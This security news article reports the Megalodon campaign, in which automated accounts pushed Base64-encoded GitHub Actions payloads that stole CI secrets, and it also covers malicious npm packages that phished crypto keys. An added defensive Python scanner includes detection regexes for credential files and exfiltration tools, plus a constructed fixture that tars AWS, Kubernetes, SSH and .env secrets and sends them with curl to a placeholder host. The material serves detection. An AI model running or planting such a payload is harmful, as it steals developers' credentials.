A new large-scale campaign dubbed Megalodon has compromised at least 5,561 GitHub repositories using fake security notifications and malicious pull requests. The attack targeted open-source developers and could have led to token theft and malware infections.
Researchers have detailed a new, fully automated campaign they call Megalodon. In roughly six hours, the attackers delivered 5,718 malicious commits to 5,561 GitHub repositories. The primary objective was to steal CI/CD secrets, cloud tokens, and developers' access to their own infrastructure.
Researchers from SafeDep stated that the attackers used disposable GitHub accounts with random names (e.g., rkb8el9r or lo6wt4t6) and committed under the author names build-bot, auto-ci, ci-bot, and pipeline-bot. The commits were made to look like routine CI/CD maintenance or pipeline updates.
The injected GitHub Actions workflows contained Base64-encoded bash scripts that ran once the workflow was triggered. On execution, the malicious workflow collected sensitive data from the repository and its CI environment and sent it to a command-and-control (C2) server at 216.126.225[.]129:8443.
An enormous amount of sensitive information was exposed during this campaign. The malware stole CI environment variables, AWS credentials, Google Cloud tokens, GitHub Tokens, GitLab CI/CD tokens, Bitbucket credentials, Docker and Kubernetes configurations, Terraform secrets, SSH keys, shell history, and .env, credentials.json, and service-account.json files.
In addition, the researchers reported that the malware searched for API keys, JWT tokens, database connection strings, PEM keys, and cloud tokens using more than 30 different regular expressions.
One confirmed example was the @tiledesk/tiledesk-server package, where SafeDep found a Base64 payload inside the GitHub Actions workflow. SafeDep also reported that all of the compromises took place on May 18, 2026, between 11:36 and 17:48 UTC.
SafeDep also stated that the campaign used two payload variants. The first, called SysDiag, was very aggressive: it was triggered on every push or pull request. The second, called Optimize-Build, was much stealthier, since it could only be triggered manually via workflow_dispatch.
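As an added, defender-side example (not SafeDep's or the article's own code), the following Python script scores GitHub Actions workflow files for the traits described in the preceding paragraphs: a Base64 blob decoded and piped into a shell, a decoded payload that reads credential files and phones home, commit-author names matching the campaign's bot accounts, and a workflow_dispatch-only trigger of the Optimize-Build kind. The sample workflows, the payload they embed, and the host c2.example.invalid are constructed for the demonstration; the point scoring and the review threshold are this example's own choices, not a published detection rule.

```python
"""Heuristic scanner for GitHub Actions workflow files showing the
Megalodon-style pattern: a Base64-encoded shell payload decoded and
executed by the workflow, run on push/pull_request or workflow_dispatch,
committed by a throwaway "bot" author.  Example code added for this
article; the sample workflows below are constructed, not from a real repo."""
import base64
import re

# Commit author names the article reports the campaign used.
SUSPICIOUS_AUTHORS = {"build-bot", "auto-ci", "ci-bot", "pipeline-bot"}

# "... | base64 -d | bash" style decode-and-execute pipelines.
DECODE_EXEC_RE = re.compile(
    r"base64\s+(?:-d|--decode)\b[^\n|]*\|\s*(?:bash|sh|zsh|python3?|eval)\b")
# Base64 runs of 64+ characters that could hide a script.
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
# Files and variables a decoded payload would touch to harvest the secret
# categories the article lists (AWS, GCP, Docker, k8s, SSH, .env, ...).
HARVEST_RE = re.compile(
    r"\.aws/credentials|\.kube/config|\.docker/config\.json|id_rsa|"
    r"\.env\b|credentials\.json|service-account\.json|GITHUB_TOKEN|"
    r"\.bash_history|\.terraform")
# Network exfiltration primitives inside the decoded payload.
EXFIL_RE = re.compile(r"\b(?:curl|wget|nc)\b.*(?:https?://|:\d{2,5})")
# Trigger names written as YAML keys under "on:" (block-list form only).
TRIGGER_RE = re.compile(r"^\s*(push|pull_request|workflow_dispatch)\s*:", re.M)


def decode_blobs(text):
    """Return the decoded text of every Base64 run that is valid UTF-8."""
    decoded = []
    for blob in B64_BLOB_RE.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # binary data or a non-Base64 token; ignore
    return decoded


def scan_workflow(text, author=""):
    """Score one workflow file; returns (score, reasons, triggers).

    Each matched trait adds one point.  A score of 3 or more is worth a
    manual review; a decoded payload that both reads credentials and
    phones home is the most incriminating combination."""
    reasons = []
    triggers = sorted(set(TRIGGER_RE.findall(text)))
    if author in SUSPICIOUS_AUTHORS:
        reasons.append(f"commit author '{author}' matches campaign bot names")
    if DECODE_EXEC_RE.search(text):
        reasons.append("workflow decodes Base64 and pipes it into a shell")
    for payload in decode_blobs(text):
        if HARVEST_RE.search(payload):
            reasons.append("decoded payload reads credential files/variables")
        if EXFIL_RE.search(payload):
            reasons.append("decoded payload contains a network exfiltration command")
    # Manual-only trigger plus a malicious payload: the stealthy sleeper variant.
    if triggers == ["workflow_dispatch"] and reasons:
        reasons.append("manual-only trigger (Optimize-Build style sleeper)")
    return len(reasons), reasons, triggers


# --- constructed fixtures (c2.example.invalid is a placeholder host) ---
SCRIPT = """#!/bin/bash
# constructed stand-in for the collection stage the article describes
tar cz ~/.aws/credentials ~/.kube/config ~/.ssh/id_rsa .env 2>/dev/null | curl -s --data-binary @- http://c2.example.invalid:8443/collect
"""
PAYLOAD_B64 = base64.b64encode(SCRIPT.encode()).decode()

MALICIOUS_WORKFLOW = f"""name: SysDiag
on:
  push:
  pull_request:
jobs:
  diag:
    runs-on: ubuntu-latest
    steps:
      - run: echo '{PAYLOAD_B64}' | base64 -d | bash
"""

SLEEPER_WORKFLOW = f"""name: Optimize-Build
on:
  workflow_dispatch:
jobs:
  opt:
    runs-on: ubuntu-latest
    steps:
      - run: echo '{PAYLOAD_B64}' | base64 --decode | sh
"""

BENIGN_WORKFLOW = """name: CI
on:
  push:
    branches: [main]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""

if __name__ == "__main__":
    for name, wf, who in (("SysDiag", MALICIOUS_WORKFLOW, "build-bot"),
                          ("Optimize-Build", SLEEPER_WORKFLOW, "auto-ci"),
                          ("benign CI", BENIGN_WORKFLOW, "octocat")):
        score, reasons, triggers = scan_workflow(wf, who)
        print(f"{name}: score={score} triggers={triggers}")
        for r in reasons:
            print("  -", r)
```

Run the script against every file under .github/workflows in a checkout, passing the author of the commit that last touched each file; in practice this heuristic is a triage aid for repositories with many workflow changes in a short window, not a substitute for reading the decoded payload.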
“workflow_dispatch makes concessions for operational security,” explained SafeDep. “With over 5,700 compromised repositories — even if we assume an extremely low number of those will provide us with an accessible GITHUB_TOKEN — an attacker can create targets that they can use as needed.”
Once a malicious commit was merged into a repository, the malware executed inside the CI/CD pipeline and continued to propagate outward across the open-source community, behaviour many describe as worm-like.
Based on these events, experts are now drawing comparisons between Megalodon and the larger-scale supply chain attacks by TeamPCP and Mini Shai-Hulud. TeamPCP previously targeted numerous large open-source projects, including TanStack, Grafana Labs, OpenAI and Mistral AI, through dependency injection and the exploitation of open-source tools.
“We have entered an age of mass supply chain attacks,” stated Moshe Siman Tov Bustan of OX Security. “TeamPCP’s breach of GitHub was merely the start. We will see an ocean of cyberattacks against developers globally.”
Additionally, researchers identified another threat vector, this time on npm. An account named polymarketdev published nine malicious npm packages in less than one minute. The packages presented themselves as CLI tools for trading on Polymarket.
When a package was installed, a fake wallet-binding window opened and prompted the user to enter an Ethereum or Polygon private key. SafeDep found that the private keys were transmitted in plain text via a Cloudflare Worker.
“The attacker established a complete trading CLI interface around a credential theft operation,” the analysts stated of the attack. They added that the attackers relied on social engineering and impersonation of a legitimate application to carry it out.
Hudson Rock subsequently published its own findings linking Megalodon to infostealer infections. The company stated that more than 33% of the GitHub users whose repositories were affected already appeared in databases of data stolen from infostealer-infected computers.
“The Megalodon campaign is a stark reminder that once a developer has been infected with infostealer malware, GitHub becomes a launchpad for catastrophic cascading attacks,” stated Hudson Rock.
Following several such incidents, npm has begun revoking access tokens that can bypass two-factor authentication and recommends that developers use Trusted Publishing.
Socket indicated that simply resetting tokens would not resolve the issue. “Resetting merely offers temporary relief. It does nothing to fix the fundamental flaw.